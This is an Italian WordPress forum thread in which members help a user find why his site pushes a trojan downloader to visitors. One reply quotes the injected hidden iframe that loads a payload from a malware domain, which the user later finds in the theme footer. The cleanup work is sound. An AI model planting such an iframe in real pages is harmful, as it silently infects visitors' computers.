Home › Forum › WordPress Beta › trojan downloader su WP!
-
AutorePost
-
-
2 Gennaio 2007 alle 16:27 #2864cixPartecipante
Ciao a tutti,
Si tratta di un sito di informazione configurato da me in WordPress, realizzato circa un anno fa (vi fornisco indirizzo su richiesta, se ritenete possa esser utile): gli attuali gestori/amministratori mi hanno chiesto assistenza in quanto già dalla home-page e anche su alcuni collegamenti interni, parte in download un virus-trojan – denominato yepjnddqpq.biz (??) – rilevato da alcuni antivirus come JS/Trojan Downloader Agent B1.
la versione installata o già aggiornata (non ricordo) era la 2.0.
Non ci sono plugin particolari.
Ho fatto un upgrade all’ultima 2.0.5, per capire se era un problema di vulnerabilità .
Aggiornamento eseguito con successo ma il Trojan non se ne va!
Qualcuno ha mai avuto un problema simile?
Cosa posso fare per risolvere?
(il server su cui loro si appoggiano è ARUBA/linux)
Vi ringrazio anticipatamente per l’attenzione, chiedetemi il link al sito (ve lo fornisco su vs richiesta e se mi assicurate che siete protetti!, non vorrei “infettarvi” …)
buon 2007.
attendo le solite costruttive considerazioni.
-
2 Gennaio 2007 alle 17:30 #42599wollyAmministratore del forum
cerca negli ultimi post sul forum , molto probabilmente usi un sistema di statistiche free che in realtà manda dialer e altro.
NON è colpa di WP.
ciao
wolly
-
2 Gennaio 2007 alle 17:31 #42600SteveAglAmministratore del forum
Usi qualche servizio di statistiche esterno? Ve ne era uno che so dava sto problema…
-
2 Gennaio 2007 alle 17:43 #42602cixPartecipante
Grazie Wolly.
Ho preso in considerazione le statistiche free ma ti assicuro che non viene utilizzato alcun contatore free.
Veniva utilizzato un plugin wordpress – wp-shortstat – che, appena mi hanno segnalato il problema, ho disattivato (ancora prima di fare l’upgrade all’ultima versione WP, anche se è stato attivo per un anno senza creare alcun problema).
chiedo quindi se secondo te/voi possono esserci altre considerazioni-soluzioni.
saluti
-
2 Gennaio 2007 alle 18:01 #42604SteveAglAmministratore del forum
Ho preso in considerazione le statistiche free ma ti assicuro che non viene utilizzato alcun contatore free.
Altri servizi esterni? Banner, pubblicità , eccetera? Se ci sono, disattiva tutto e riprova.
Oppure scarica il template di default e senza fare nessuna modifica attivalo, poi disattiva tutti i plugin e controlla se il download del virus viene lanciato. Se non succede niente, il problema è nel template.
Se non riesci a capire da dove esce fuori questo link, cerca di intercettare l’URL e fai un controllo sul sorgente PHP dell’intero blog (fatti una copia in locale) con un editor di testo che ti permette di cercare delle stringhe di testo nell’intera cartella del blog.
-
2 Gennaio 2007 alle 18:17 #42605wollyAmministratore del forum
metti il link al blog .
quali altri servizi e pòugin hai installato ?
ciao
-
2 Gennaio 2007 alle 18:23 #42606wollyAmministratore del forum
p.s.: hai l’accesso ftp per controllare che non sia stato aggiunto qualche cosa a tua insaputa nella root del dominio ?
ciao
wolly
-
2 Gennaio 2007 alle 19:01 #42608cixPartecipante
Si certo, l’accesso ftp e al db mysql li ho, infatti ho fatto l’upgrade all’ultima versione WP: non mi sembra ci siano upload strani e poi il rapporto con chi amministra il sito è amichevole/cordiale: ho chiesto subito se ritenevano di aver fatto cose “fuori dall’ordinaria pubblicazione” di articoli… mi hanno detto di no!
(ovviamente non sono in grado di verificare tutti i contenuti, perchè non sono io l’amministratore dei contenuti, di certo non installano counter o plugin di loro spontanea volontà …hanno un rapporto con il blog di esclusiva pubblicazione di articoli).
i plugin installati sono:
un editor di testo avanzato (edtormonkey)
democracy – per i sondaggi
opt in front page – per avere una home fissa
search everithing – per le ricerche avanzate
subscribe 2 – per newsletter
wp contact form
i plugin non hanno dato mai alcun problema – link. (preferivo non postare il link per evitare diffusioni eventuali del trojan e per una questione di “riservatezza” ma ho bisogno di un aiuto…)
ho notato che il file incriminato parte soprattutto quando si linka alle pagine statiche (nella sezione “about”).
attendo una verifica, grazie ancora.
-
2 Gennaio 2007 alle 19:02 #42609cixPartecipante
scusate, una ripetizione di invio…quello giusto è qua sopra.
grazie
-
2 Gennaio 2007 alle 19:19 #42610wollyAmministratore del forum
con firefox 2.0 funziona tutto perfettamente senza virus o altri.
con ie 7.0 non riesco ad aprire il sito.
Il vecchio ie purtroppo non ce l’ho.
Secondo me c’è qualcosa nella root , prova a scaricare index.php e vedere cosa c’è scritto dentro.
Se cerchi nel forum trovi un messaggio di un altro utente che ha l’hosting su aruba linux e aveva il file index.php hackerato (dovrebbe esserci anche la soluzione).
Personamente ho i miei siti tutti hostati su aruba linux e non ho avuto (per ora ) problemi.
ciao
wolly
-
2 Gennaio 2007 alle 19:27 #42611PseudoTecnicoPartecipante
Io sto usando un Mac (quindi niente antivirus); nel codice non si vede nulla di strano (non ci sono inclusioni di file .js o simili).
Che antivirus ti rileva il trojan downloader? L’hai verificato anche su un sistema sicuramente sano (ad esempio il tuo)?
Due prove:
a) Mi è capito di subire un deface su uno dei siti che gestisco; scaricando i file da ftp, il file malevolo è stato rilevato dall’antivirus. Magari potresti provare a scaricarti in locale tutto il contenuto del sito
b) Prova a disattivare tutti i plugin ed attivare il tema di default. A questo punto riattiva i vari elementi uno alla volta (prima il tema, poi un plugin, poi un altro, ecc. ecc.).
-
2 Gennaio 2007 alle 19:45 #42612cixPartecipante
Ciao Wolly, infatti con Explorer è un disastro…io fino ad ora usavo Firefox e notavo il downloader ma non mi si bloccava tutto in quel modo. Grazie per il consiglio sull’index.php, provo a verificare anche se spero non sia hackerato.
Pseudotecnico: grazie per le considerazioni e i consigli. L’antivirus rileva un Trojan Horse di livello basso, non c’è neanche il nome. Explorer si impalla e l’antivirus avvia la scansione, rileva i trojan (perchè si clonano) e li elimina senza fatica. Su Firefox non si impalla nulla ma la navigazione rallenta notevolmente e si vede che ogni link porta “prima ” ad un downloader. Puoi eventualmente fare una scansione con un antispyware e vedere che effettivamente non abbia infettato il mac?
per la soluzione a) già attuata, non ha rilevato nessun malware e ho scansionato con due antivirus.
soluzione b) provo e ti dico.
non abbandonatemi e grazie davvero.
-
2 Gennaio 2007 alle 20:00 #42613PseudoTecnicoPartecipante
Non preoccuparti per il Mac, un trojan non può fare danni
Ho fatto una prova su un XP Pro Sp2 emulato su Parallels (Firefox+Antivirus AVG) e non rileva nulla
Con Internet Explorer 7 viene rilevato il virus su un file html
Dal nome del file (slide647 e adv647) direi che il tuo problema è questo
http://forum.html.it/forum/showthread.php?s=&threadid=1072320
Ho anche individuato il pezzo incriminato nella index: prova a cercare nel sorgente un tag iframe
<iframe src="http://yepjnddqpq.biz/dl/adv647.php" width=1 height=1 style="display:none"></iframe>
Attenzione: il codice è cifrato, questo forum decodifica automaticamente i caratteri unicode, per cui nel sorgente apparirà diverso
-
2 Gennaio 2007 alle 20:43 #42614cixPartecipante
ok pseudotecnico per il mac . in effetti è il pc che ti fa stare sempre in ansia.
grande! grazie per i tuoi rilevamenti.
Il problema è probabilmente ed effettivamente (spero) quello, perchè il tag ed il nome (yep….biz e adv647) sono gli script che il sito invia..
solo che, io non riesco a trovare il tag incriminato, sto cercando nel file index.php nella root principale: scusa l’ignoranza ma credo a questo punto di dovermi far spiegare “cercare nel sorgente”… cosa devo fare per cercare nel sorgente?.
altra curiosità : ma secondo te, come è possibile che possa essere capitato questo? è un attacco, lieve, ma è cosà¬?
grazie
-
2 Gennaio 2007 alle 21:00 #42615wollyAmministratore del forum
Il testo potrebbe essere essere nel index.php del tuo tema.
Potrebbe però essere aggiunto da qualche plugin.
Quindi disattiva tutti i plugin e riattivali uno ad uno.
ciao
wolly
-
2 Gennaio 2007 alle 21:31 #42616cixPartecipante
wolly e pseudotecnico, vi aggiorno:
in seguito ai vostri consigli ho disattivato tutti i plugin, lasciato il sito con il tema da me modificato e il problema c’è sempre.
ho disattivato tutti i plugin e attivato il tema di default e il sito non presenta più il problema.
Sempre con il tema di default, ho riattivato uno a uno i plugin, guardando e testando il sito ogni volta: il virus sembra scomparso.
avete quindi individuato l’errore ma io non ancora: sul file index.php del tema elaborato non trovo nessun tag o link a script “strani”… Oltretutto quel tema non ha mai dato problemi… e l’avevo ovviamente personalizzato per quel tipo di sito…
sapreste indicarmi come procedere?? uff….vi ringrazio per la pazienza.
-
2 Gennaio 2007 alle 21:42 #42617wollyAmministratore del forum
puoi provare nell’ordine a guardare nel tema modificato :
header.php
page.php(dato che il problema si verificafa li)
footer.php
So che è dura ricordarselo ma, potresti aver fatto delle modifiche che poi hai parzialmente eliminato lasciando del codice oppure potrebbe essere stato hackerato qualche file (strano e se fosse cosଠmi preoccuperei anche per i miei blog su aruba , potrebbe essesserci una fallasui server linux di aruba)
Se ancora non trovi nulla , butta via il tema modificato ,riscarica la versione originale da un sito sicuro , rifai le modifiche e rimettilo online
Altro non saprei consigliarti
ciao
wolly
-
2 Gennaio 2007 alle 22:12 #42618cixPartecipante
wolly, era troppo dura ricordarsi ma io ti ringrazio, è ringrazio pseudotecnico perchè ho trovato il tag da lui rilevato nel footer del tema: come mi hai consigliato tu: li ho aperti nell’ordine da te indicato e al fondo del fondo…eccolo là¬!!! azzz. eliminato e uploadato: pare a posto.
siete una bella squadretta )) —mi avete evitato notti insonni. grazie.
però… avete voglia di spiegarmi come sia potuto capitare??? Dove stà l’errore? – sono curioso…era da mò che non riprendevo in mano wordpress e guarda come devo riavvicinarmi!
grazie e un abbraccio virtuale a entrambi.
-
2 Gennaio 2007 alle 22:32 #42619wollyAmministratore del forum
da dove hai scaricato il tema ?
potrebbe essere bacato dall’inizio ,oppure magari era il codice da inserire per qualche servizio, rimasto li dopo alcune modifiche oppure boh le possibilità sono tante
ciao
wolly
-
2 Gennaio 2007 alle 23:22 #42620
-
-
AutorePost
- Devi essere connesso per rispondere a questo topic.